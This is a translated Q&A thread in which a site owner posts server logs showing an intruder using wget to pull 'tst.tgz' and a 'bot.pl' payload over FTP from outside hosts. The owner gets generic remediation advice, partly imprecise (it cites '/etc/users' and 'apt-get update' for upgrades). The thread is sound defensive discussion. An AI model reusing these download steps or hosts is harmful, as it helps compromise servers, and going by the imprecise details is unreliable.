在我超出带宽后,我的网站主机禁用了我的帐户。这很奇怪,因为网站很小。我开始查看日志,虽然我习惯于看到尝试查找我没有的常见端点,但我看到了一些非常令人不安的事情。首先:
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0
100 77597 100 77597 0 0 184k 0 --:--:-- --:--:-- --:--:-- 246k
--2019-10-13 11:49:21-- ftp://matei:*password*@tyger.ignorelist.com/tst.tgz
=> `tst.tgz'
Resolving tyger.ignorelist.com... 86.121.73.246
Connecting to tyger.ignorelist.com|86.121.73.246|:21... connected.
Logging in as matei ... Logged in!
==> SYST ... done. ==> PWD ... done.
==> TYPE I ... done. ==> CWD not needed.
==> SIZE tst.tgz ... 21765
==> PASV ... done. ==> RETR tst.tgz ... done.
0K .......... .......... . 53.3K=0.4s
2019-10-13 11:49:23 (53.3 KB/s) - `tst.tgz' saved [21765]
和
我从未见过这些东西。我觉得我不知怎么被控制了。我该如何解决?
curl: (7) couldn't connect to host
curl: (7) couldn't connect to host
Can't open perl script "bot.pl": No such file or directory
Can't open perl script "bot.pl": No such file or directory
sh: GET: command not found
sh: GET: command not found
--2019-10-15 22:14:04-- ftp://94.177.240.65/bot.pl
=> `bot.pl'
Connecting to 94.177.240.65:21... --2019-10-15 22:14:04--
ftp://94.177.240.65/bot.pl
=> `bot.pl'
Connecting to 94.177.240.65:21... failed: Connection refused.
failed: Connection refused.
答案1
看起来您的 Linux 机器已通过 Apache 服务受到攻击。
我如何解决它?
没有简单的解决办法,因为您需要调查整个系统是否存在潜在的漏洞。
以下是一些一般建议:
- 将 Apache 升级到最新版本(通过
apt-get)。 - 升级所有软件包(
sudo apt-get update)。 - 升级所有正在使用的 Web CMS/框架(检查任何已知漏洞)。
- 扫描整个系统以查找任何现有漏洞(例如恶意软件扫描程序、防病毒软件)。
- 扫描所有网站以查找任何恶意软件和 shellcode 文件。
如果您使用 PHP:
- 用一个PHP 安全扫描程序。
- 用一个基于 PHP 的网站的恶意软件扫描程序。
- 如果您使用共享主机,请联系主机公司。
- 检查您的系统是否有任何额外的意外用户(
/etc/users)或文件(例如/tmp)。 如果您已确认违规行为:
- 更改所有公开的凭证(访问密钥、密码等)。
- 保存所有证据以备不时之需(IP 地址、日志、受感染/恶意软件文件)。
- 修补系统后,请继续监控日志以查找任何进一步的可疑活动。
如果您对以上内容没有信心,请联系专门从事该工作的 IT 公司。
也可以看看: